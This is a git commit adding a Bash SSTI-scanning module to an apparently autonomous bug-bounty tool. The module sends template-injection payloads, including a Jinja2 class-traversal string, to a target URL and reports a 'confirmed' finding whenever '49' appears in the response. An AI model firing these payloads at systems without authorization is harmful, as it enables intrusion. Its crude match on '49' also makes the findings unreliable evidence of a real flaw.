The Analyzer v1.0 — autonomous bug bounty engine with 20 attack vectors and Ollama brain
This commit is contained in:
53
vectors/08-ssti.sh
Executable file
53
vectors/08-ssti.sh
Executable file
@@ -0,0 +1,53 @@
|
||||
#!/usr/bin/env bash
|
||||
# Vector 08: Server-Side Template Injection
|
||||
# Desc: SSTI in template engines (Jinja2, Twig, Freemarker, etc.)
|
||||
# Detect: Template syntax errors, {{}} reflected, error pages
|
||||
# Severity: CRITICAL
|
||||
# Tools: curl
|
||||
|
||||
vector_ssti() {
|
||||
local target="$1"
|
||||
local report="$2"
|
||||
local findings=0
|
||||
|
||||
print_info "Testing SSTI vectors..."
|
||||
|
||||
local ssti_payloads=(
|
||||
"{{7*7}}"
|
||||
"\${7*7}"
|
||||
"#{7*7}"
|
||||
"*{7*7}"
|
||||
"<%= 7*7 %>"
|
||||
"${{7*7}}"
|
||||
"{{config}}"
|
||||
"${7*7}"
|
||||
"{{''.__class__.__mro__[2].__subclasses__()}}"
|
||||
)
|
||||
|
||||
for payload in "${ssti_payloads[@]}"; do
|
||||
local encoded=$(python3 -c "import urllib.parse; print(urllib.parse.quote('${payload}'))" 2>/dev/null || echo "$payload")
|
||||
local test_url=""
|
||||
if [[ "$target" == *\?* ]]; then
|
||||
test_url="${target}&q=${encoded}"
|
||||
else
|
||||
test_url="${target}?q=${encoded}"
|
||||
fi
|
||||
|
||||
local response=$(curl -s --connect-timeout 5 --max-time 10 "$test_url" 2>/dev/null)
|
||||
|
||||
if echo "$response" | grep -q "49\|${payload}"; then
|
||||
if echo "$response" | grep -q "49"; then
|
||||
print_find "SSTI confirmed!" "Template engine evaluated {{7*7}} = 49"
|
||||
echo "SEVERITY: CRITICAL
|
||||
VECTOR: Server-Side Template Injection (SSTI)
|
||||
DETAIL: SSTI confirmed on $target
|
||||
EVIDENCE: Payload {{7*7}} evaluated to 49
|
||||
EXPLOIT: Possible RCE: {{''.__class__.__mro__[2].__subclasses__()}} (Jinja2)" > "$REPORTS_DIR/.finding_$(date +%s)_ssti.txt"
|
||||
findings=$((findings + 1))
|
||||
break
|
||||
fi
|
||||
fi
|
||||
done
|
||||
|
||||
return $findings
|
||||
}
|
||||
Reference in New Issue
Block a user